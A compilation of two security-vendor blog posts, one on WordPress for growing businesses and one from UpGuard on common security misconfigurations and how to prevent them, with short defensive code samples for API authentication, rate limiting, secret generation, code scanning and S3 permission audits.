As your business grows, you need a platform that can grow with you, and WordPress excels in this aspect. The platform allows you to scale up or down easily based on your business needs. Whether you’re adding new products, launching a subscription service, or expanding into new markets, WordPress remains stable and functional. Furthermore, it’s essential to choose a hosting plan that can adapt as you grow. The right host will offer various server resources and hosting plans that can be modified to meet your increasing requirements, ensuring that scaling up doesn’t become a bottleneck for your business.

Analytics and Reporting

Data is vital in understanding how your business is performing, and WordPress allows for seamless integration with analytics tools like Google Analytics. With just a few clicks, you can have access to a wealth of information ranging from visitor demographics to behavior patterns. WordPress also offers plugins that can help you monitor key performance indicators (KPIs). By keeping an eye on these metrics, you can gain valuable insights into customer behavior, which in turn can inform your business strategies and help you make data-driven decisions.

Conclusion

In sum, WordPress isn’t just a platform for bloggers; it’s a comprehensive tool for businesses of all sizes. Its open-source nature, scalability, and a vast array of customization options make it a compelling choice for entrepreneurs looking to build an online presence without breaking the bank. With robust security measures, SEO capabilities, and integrated eCommerce solutions, WordPress offers a well-rounded package that can adapt to your evolving business needs.

Whether you’re looking to attract a global audience, keep your site secure, or gain valuable insights through analytics, WordPress provides the tools you need to not just survive, but thrive in the competitive digital landscape.

Source :
https://getshieldsecurity.com/blog/how-wordpress-can-help-scale-your-business/

Top 5 Security Misconfigurations Causing Data Breaches in 2023

Edward Kost
updated May 15, 2023

Security misconfigurations are a common and significant cybersecurity issue that can leave businesses vulnerable to data breaches. According to the latest Cost of a Data Breach report by IBM and the Ponemon Institute, the average cost of a breach has reached US$4.35 million. Many data breaches are caused by avoidable errors like security misconfiguration. By following the tips in this article, you could identify and address a security error that could save you millions of dollars in damages.

Learn how UpGuard can help you detect data breach risks >

What is a Security Misconfiguration?

A security misconfiguration occurs when a system, application, or network device’s settings are not correctly configured, leaving it exposed to potential cyber threats. This could be due to default configurations left unchanged, unnecessary features enabled, or permissions set too broadly. Hackers often exploit these misconfigurations to gain unauthorized access to sensitive data, launch malware attacks, or carry out phishing attacks, among other malicious activities.

What Causes Security Misconfigurations?

Security misconfigurations can result from various factors, including human error, lack of awareness, and insufficient security measures. For instance, employees might configure systems without a thorough understanding of security best practices, or security teams might overlook crucial security updates due to the growing complexity of cloud services and infrastructures.

Additionally, the rapid shift to remote work during the pandemic has increased the attack surface for cybercriminals, making it more challenging for security teams to manage and monitor potential vulnerabilities.

List of Common Types of Security Misconfigurations Facilitating Data Breaches

Some common types of security misconfigurations include:

1. Default Settings

With the rise of cloud solutions such as Amazon Web Services (AWS) and Microsoft Azure, companies increasingly rely on these platforms to store and manage their data. However, using cloud services also introduces new security risks, such as the potential for misconfigured settings or unauthorized access.

A prominent example of insecure default software settings that could have facilitated a significant breach is the Microsoft Power Apps data leak incident of 2021. By default, Power Apps portal data feeds were set to be accessible to the public.

Unless developers specified for OData feeds to be set to private, virtually anyone could access the backend databases of applications built with Power Apps. UpGuard researchers located the exposure and notified Microsoft, who promptly addressed the leak. UpGuard’s detection helped Microsoft avoid a large-scale breach that could have potentially compromised 38 million records.

Read this whitepaper to learn how to prevent data breaches >

2. Unnecessary Features

Enabling features or services not required for a system’s operation can increase its attack surface, making it more vulnerable to threats. Some examples of unnecessary product features include remote administration tools, file-sharing services, and unused network ports. To mitigate data breach risks, organizations should conduct regular reviews of their systems and applications to identify and disable or remove features that are not necessary for their operations.

Additionally, organizations should practice the principle of least functionality, ensuring that systems are deployed with only the minimal set of features and services required for their specific use case.

3. Insecure Permissions

Overly permissive access controls can allow unauthorized users to access sensitive data or perform malicious actions. To address this issue, organizations should implement the principle of least privilege, granting users the minimum level of access necessary to perform their job functions. This can be achieved through proper role-based access control (RBAC) configurations and regular audits of user privileges. Additionally, organizations should ensure that sensitive data is appropriately encrypted both in transit and at rest, further reducing the risk of unauthorized access.

4. Outdated Software

Failing to apply security patches and updates can expose systems to known vulnerabilities. To protect against data breaches resulting from outdated software, organizations should have a robust patch management program in place. This includes regularly monitoring for available patches and updates, prioritizing their deployment based on the severity of the vulnerabilities being addressed, and verifying the successful installation of these patches.

Additionally, organizations should consider implementing automated patch management solutions and vulnerability scanning tools to streamline the patching process and minimize the risk of human error.

5. Insecure API Configurations

APIs that are not adequately secured can allow threat actors to access sensitive information or manipulate systems. API misconfigurations, like the one that led to T-Mobile’s 2023 data breach, are becoming more common. As more companies move their services to the cloud, securing these APIs and preventing the data leaks they facilitate is becoming a bigger challenge.

To mitigate the risks associated with insecure API configurations, organizations should implement strong authentication and authorization mechanisms, such as OAuth 2.0 or API keys, to ensure only authorized clients can access their APIs. Additionally, organizations should conduct regular security assessments and penetration testing to identify and remediate potential vulnerabilities in their API configurations.

Finally, adopting a secure software development lifecycle (SSDLC) and employing API security best practices, such as rate limiting and input validation, can help prevent data breaches stemming from insecure APIs.
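
To make these recommendations more concrete, here is a minimal PHP sketch (our own illustration, not a complete solution) that combines an API key check using a constant-time comparison with a naive per-minute rate limit. It assumes the APCu extension is available, and the key storage, header name, limits, and responses are placeholders.

<?php
// Minimal illustrative API gate: constant-time key check plus a naive rate limit.
$expected = getenv('API_KEY') ?: '';            // expected key from the environment
$provided = $_SERVER['HTTP_X_API_KEY'] ?? '';   // key sent in the X-Api-Key header

if ($expected === '' || !hash_equals($expected, $provided)) {
    http_response_code(401);
    exit('unauthorized');
}

// Naive per-key, per-minute counter stored in APCu (assumes the APCu extension).
$bucket = 'rate:' . hash('sha256', $provided) . ':' . floor(time() / 60);
$count  = apcu_inc($bucket, 1, $success, 120);  // counter expires after two minutes
if ($count !== false && $count > 100) {         // allow at most 100 requests per minute
    http_response_code(429);
    exit('rate limit exceeded');
}

// ... input validation and the actual API logic would follow here ...
?>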

Learn how UpGuard protects against third-party breaches >

How to Avoid Security Misconfigurations Impacting Your Data Breach Resilience

To protect against security misconfigurations, organizations should:

1. Implement a Comprehensive Security Policy

Implement a cybersecurity policy covering all system and application configuration aspects, including guidelines for setting permissions, enabling features, and updating software.

2. Implement a Cyber Threat Awareness Program

An essential security measure that should accompany the remediation of security misconfigurations is employee threat awareness training. Of those who recently suffered cloud security breaches, 55% of respondents identified human error as the primary cause.

With your employees equipped to correctly respond to common cybercrime tactics that preceded data breaches, such as social engineering attacks and social media phishing attacks, your business could avoid a security incident should threat actors find and exploit an overlooked security misconfiguration.

Phishing attacks involve tricking individuals into revealing sensitive information that could be used to compromise an account or facilitate a data breach. During these attacks, threat actors target account login credentials, credit card numbers, and even phone numbers to exploit Multi-Factor authentication.

Learn the common ways MFA can be exploited >

Phishing attacks are becoming increasingly sophisticated, with cybercriminals using automation and other tools to target large numbers of individuals. 

Here’s an example of a phishing campaign where a hacker has built a fake login page to steal a customer’s banking credentials. As you can see, the fake login page looks almost identical to the actual page, and an unsuspecting eye will not notice anything suspicious.

[Image: Real Commonwealth Bank login page]
[Image: Fake Commonwealth Bank login page]

Because password reuse is a common habit amongst the general population, phishing campaigns could involve fake login pages for social media websites, such as LinkedIn, popular websites like Amazon, and even SaaS products. Hackers implementing such tactics hope the same credentials are also used for logging into banking websites.

Cyber threat awareness training is the best defense against phishing, the most common attack vector leading to data breaches and ransomware attacks.

Because small businesses often lack the resources and expertise of larger companies, they usually don’t have the budget for additional security programs like awareness training. This is why, according to a recent report, 61% of small and medium-sized businesses experienced at least one cyber attack in the past year, and 40% experienced eight or more attacks.

Luckily, with the help of ChatGPT, small businesses can implement an internal threat awareness program at a fraction of the cost. Industries at a heightened risk of suffering a data breach, such as healthcare, should especially prioritize awareness of the cyber threat landscape.

Learn how to implement an internal cyber threat awareness campaign >

3. Use Multi-Factor Authentication

Use MFA and strong access management controls to limit unauthorized access to sensitive systems and data.

Previously compromised passwords are often used to hack into accounts. MFA adds additional authentication factors to the login process, making it difficult to compromise an account even if hackers get their hands on a stolen password.

4. Use Strong Access Management Controls

Identity and Access Management (IAM) systems ensure users only have access to the data and applications they need to do their jobs and that permissions are revoked when an employee leaves the company or changes roles.

The 2023 Thales Data Threat Report found that 28% of respondents identified IAM as the most effective data security control for preventing personal data compromise.

5. Keep All Software Patched and Updated

Keep all environments up-to-date by promptly applying patches and updates. Consider patching a “golden image” and deploying it across your environment. Perform regular scans and audits to identify potential security misconfigurations and missing patches.

An attack surface monitoring solution, such as UpGuard, can detect vulnerable software versions that have been impacted by zero-days and other known security flaws.

6. Deploy Security Tools

Deploy security tools, such as intrusion detection and prevention systems (IDPS) and security information and event management (SIEM) solutions, to monitor and respond to potential threats.

It’s also essential to implement tools that defend against tactics often used to complement data breach attempts, for example, DDoS attacks: a type of attack where a server is flooded with fake traffic to force it offline, allowing hackers to exploit security misconfigurations during the chaos of excessive downtime.

Another important security tool is a data leak detection solution for discovering compromised account credentials published on the dark web. These credentials, if exploited, allow hackers to compress the data breach lifecycle, making these events harder to detect and intercept.

Data leaks compressing the data breach lifecycle.

Learn how to detect and prevent data leaks >

7. Implement a Zero-Trust Architecture

One of the main ways that companies can protect themselves from cloud-related security threats is by implementing a Zero Trust security architecture. This approach assumes all requests for access to resources are potentially malicious and, therefore, require additional verification before granting access.

Learn how to implement a Zero-Trust Architecture >

A Zero-Trust approach to security assumes that all users, devices, and networks are untrustworthy until proven otherwise.
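
In practice, "untrusted until proven otherwise" means authenticating every request, even those originating inside the network perimeter. The sketch below, which assumes Flask and a greatly simplified shared-token scheme, rejects any request that does not carry a valid service token, regardless of its source IP.

```python
# Zero-Trust flavoured sketch: authenticate every request, even "internal" ones.
# Assumes Flask; a production setup would use mTLS or signed, expiring tokens.
import hmac
import os

from flask import Flask, abort, request

app = Flask(__name__)
EXPECTED_TOKEN = os.environ["SERVICE_TOKEN"]  # provisioned per service, rotated regularly

@app.before_request
def verify_every_request():
    supplied = request.headers.get("X-Service-Token", "")
    # No allow-listing by source IP: being "inside the network" grants nothing.
    if not hmac.compare_digest(supplied, EXPECTED_TOKEN):
        abort(401)

@app.route("/reports")
def reports():
    return {"status": "ok"}
```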

8. Develop a Repeatable Hardening Process

Establish a process that can be easily replicated to ensure consistent, secure configurations across production, development, and QA environments. Use different passwords for each environment and automate the process for efficient deployment. Be sure to address IoT devices in the hardening process. 

These devices are often left with their default factory passwords, making them easy to compromise and recruit into botnets used for DDoS attacks.
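
One small piece of that automation is generating a distinct, strong credential for every environment so production, development, and QA never share passwords. The sketch below uses Python's standard secrets module; the file names and layout are purely illustrative, and a real pipeline would push the values into a secrets manager.

```python
# Sketch: generate a distinct strong secret per environment so credentials are never shared.
import secrets
from pathlib import Path

ENVIRONMENTS = ["production", "development", "qa"]

for env in ENVIRONMENTS:
    credential = secrets.token_urlsafe(32)  # roughly 256 bits of randomness
    env_file = Path(f".env.{env}")          # illustrative; prefer a secrets manager
    env_file.write_text(f"APP_DB_PASSWORD={credential}\n")
    env_file.chmod(0o600)                   # keep the file readable by the owner only
    print(f"Wrote new credential for {env}")
```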

9. Implement a Secure Application Architecture

Design your application architecture to obfuscate general access to sensitive resources using the principle of network segmentation.

Learn more about network segmentation >

Cloud infrastructure has become a significant cybersecurity issue in the last decade. Barely a month goes by without a major security breach at a cloud service provider or a large corporation using cloud services.

10. Maintain a Structured Development Cycle

Facilitate security testing during development by adhering to a well-organized development process. Following cybersecurity best practices this early in the development process sets the foundation for a resilient security posture that will protect your data even as your company scales.

Implement a secure software development lifecycle (SSDLC) that incorporates security checkpoints at each stage of development, including requirements gathering, design, implementation, testing, and deployment. Additionally, train your development team in secure coding practices and encourage a culture of security awareness to help identify and remediate potential vulnerabilities before they make their way into production environments.

11. Review Custom Code

If using custom code, employ a static code security scanner before integrating it into the production environment. These scanners can automatically analyze code for potential vulnerabilities and compliance issues, reducing the risk of security misconfigurations.

Additionally, have security professionals conduct manual reviews and dynamic testing to identify issues that may not be detected by automated tools. This combination of automated and manual testing ensures that custom code is thoroughly vetted for security risks before deployment.
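
To make the automated half of this workflow concrete, the sketch below wraps Bandit, a static analyzer for Python code (our example tool; many equivalents exist for other languages), so a CI job can fail the build when high-severity findings appear. The "src" directory is an assumption.

```python
# Sketch: run the Bandit static analyzer and fail CI on high-severity findings.
# Bandit is one example of a static scanner (pip install bandit).
import json
import subprocess
import sys

scan = subprocess.run(
    ["bandit", "-r", "src", "-f", "json"],
    capture_output=True, text=True,
)
findings = json.loads(scan.stdout)["results"]
high = [f for f in findings if f["issue_severity"] == "HIGH"]

for finding in high:
    print(f"{finding['filename']}:{finding['line_number']} {finding['issue_text']}")

sys.exit(1 if high else 0)
```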

12. Utilize a Minimal Platform

Remove unused features, insecure frameworks, and unnecessary documentation, samples, or components from your platform. Adopt a “lean” approach to your software stack by only including components that are essential for your application’s functionality.

This reduces the attack surface and minimizes the chances of security misconfigurations. Furthermore, keep an inventory of all components and their associated security risks to better manage and mitigate potential vulnerabilities.
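
A simple starting point for that inventory, shown below for Python packages only as an illustration, is to enumerate everything installed so unused components can be spotted and removed.

```python
# Sketch: inventory installed Python packages as a first step toward a lean software stack.
# System packages and container layers need their own separate inventories.
from importlib.metadata import distributions

inventory = sorted((dist.metadata["Name"], dist.version) for dist in distributions())

for name, version in inventory:
    print(f"{name}=={version}")
print(f"\n{len(inventory)} packages installed - review anything not strictly required.")
```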

13. Review Cloud Storage Permissions

Regularly examine permissions for cloud storage, such as S3 buckets, and incorporate security configuration updates and reviews into your patch management process. This process should be a standard inclusion across all cloud security measures. Ensure that access controls are properly configured to follow the principle of least privilege, and encrypt sensitive data both in transit and at rest.

Implement monitoring and alerting mechanisms to detect unauthorized access or changes to your cloud storage configurations. By regularly reviewing and updating your cloud storage permissions, you can proactively identify and address potential security misconfigurations, thereby enhancing your organization’s data breach resilience.
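
As a hedged example of what such a recurring review might automate, the sketch below uses boto3 (assuming AWS S3 and read-only credentials) to flag buckets whose public access block settings are missing or only partially enabled.

```python
# Sketch: flag S3 buckets whose public access block settings are missing or incomplete.
# Treat the output as input to a review, not a final verdict.
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")

for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    try:
        config = s3.get_public_access_block(Bucket=name)["PublicAccessBlockConfiguration"]
        if not all(config.values()):
            print(f"{name}: public access block only partially enabled: {config}")
    except ClientError as error:
        if error.response["Error"]["Code"] == "NoSuchPublicAccessBlockConfiguration":
            print(f"{name}: no public access block configured - review immediately")
        else:
            raise
```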

How UpGuard Can Help

UpGuard’s IP monitoring feature monitors all IP addresses associated with your attack surface for security issues, misconfigurations, and vulnerabilities. UpGuard’s attack surface monitoring solution can also identify common misconfigurations and security issues shared across your organization and its subsidiaries, including the exposure of WordPress usernames, vulnerable server versions, and a range of attack vectors facilitating first- and third-party data breaches.

UpGuard’s Risk Profile feature displays security vulnerabilities associated with end-of-life software.

To further expand its coverage of data breach threat categories, UpGuard offers a data leak detection solution that scans ransomware blogs on the dark web for compromised credentials and any leaked data that could help hackers breach your network and sensitive resources.

UpGuard’s ransomware blog detection feature.

Source: https://www.upguard.com/blog/security-misconfigurations-causing-data-breaches